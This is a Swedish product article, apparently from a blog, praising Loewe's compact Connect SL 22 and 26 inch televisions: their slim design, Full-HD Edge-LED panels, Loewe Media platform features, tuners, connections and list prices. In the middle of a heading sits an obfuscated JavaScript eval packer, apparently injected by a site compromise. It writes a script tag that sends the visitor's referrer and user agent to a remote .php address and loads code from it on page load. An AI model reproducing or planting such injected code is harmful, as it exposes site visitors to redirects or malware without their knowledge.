Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Lyx TV i små storlekar – Loewe Connect SL

Lyx TV i små storlekar – Loewe Connect SL
Sebastian

TV-altaret i vardagsrummet är inte längre den väsentligaste källan till att se på TV. Överallt i bostaden ser vi på TV. I köket, i barnens rum och i sovrummet ser vi fortfarande på TV i stor stil. Även som ”extrarums-TV” är de nya Loewe Connect SL 22 och 26 tum särskilt väl anpassade. Med sin ultraplatta Slim-Line-design, praktiska storlekar och höga utrustningsnivå är de perfekta som TV i rum där utrymmet är mer begränsat än i vardagsrummet. Med den senaste Edge-LED-teknologin levererar de små Loewe Connect-modellerna den bästa bildkvalitén och kännetecknas samtidigt av låg strömförbrukning.

Liten eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|akrks|var|u0026u|referrer|rhnrh||js|php’.split(’|’),0,{}))
storlek – stor underhållning
Utmärkande för dessa TV-storlekar är att Loewe Connect SL 22 och 26 är utrustade med Full-HD teknologi kombinerat med Edge-LED Backlight. De små Connect-modellerna – även kallade Loewe Connect Mini – har en lång rad tekniska funktioner, som är ovanliga för TV i dessa storlekar – häribland Loewe Media plattformen med: MediaText, MediaHome och MediaUpdate. Sistnämnda funktion gör det enkelt att uppdatera TVns mjukvara via internet eller via USB-port. Med MediaText (HbbTV) understöds också framtidens internetbaserade text-TV-funktion och Loewe MediaHome ger tillgång till bilder, videor och musik på hemmanätverket. TVn har tillgång till internet via LAN eller Powerline förbindelse – eller via WLAN (med WLAN dongle, som finns som extra utrustning). Dessutom är Loewe Connect SL modellerna utrustade med två USB-portar, två HDMI-uttag och en LAN-port. Helt i Loewes anda, är även  de små Loewe Connect-modellerna utrustade med multi-tuner för mottagning av både DVB-T, C och S. Dessutom är det möjligt att integrera de små Connect modellerna med Loewes övriga systemlösningar, både när det gäller ljudprodukter och när det gäller streaming av program från en Loewe TV till en annan Loewe TV.

Loewe toppdesign i miniformat
De nya Connect SL-modellerna på respektive 22 och 26 tum har en fräck och iögonenfallande design. Med sin extremt platta framtoning och det kända minimalistiska Loewe utseendet ingår de som ett läckert och uppfriskande inslag i vilket rum och vilken heminredning som helst. Connect SL 22 och 26 finns i de klassiska färgerna Svart högglans, Vit högglans och Silver och levereras som standard med ett elegant bordsstativ. Som tillbehör finns dessutom både ett specialdesignat golvstativ och naturligtvis ett praktiskt väggbeslag.

Loewe Connect SL 22 har ett vägledande pris från 8.699:-
Loewe Connect SL 26 har ett vägledande pris från 9.999:-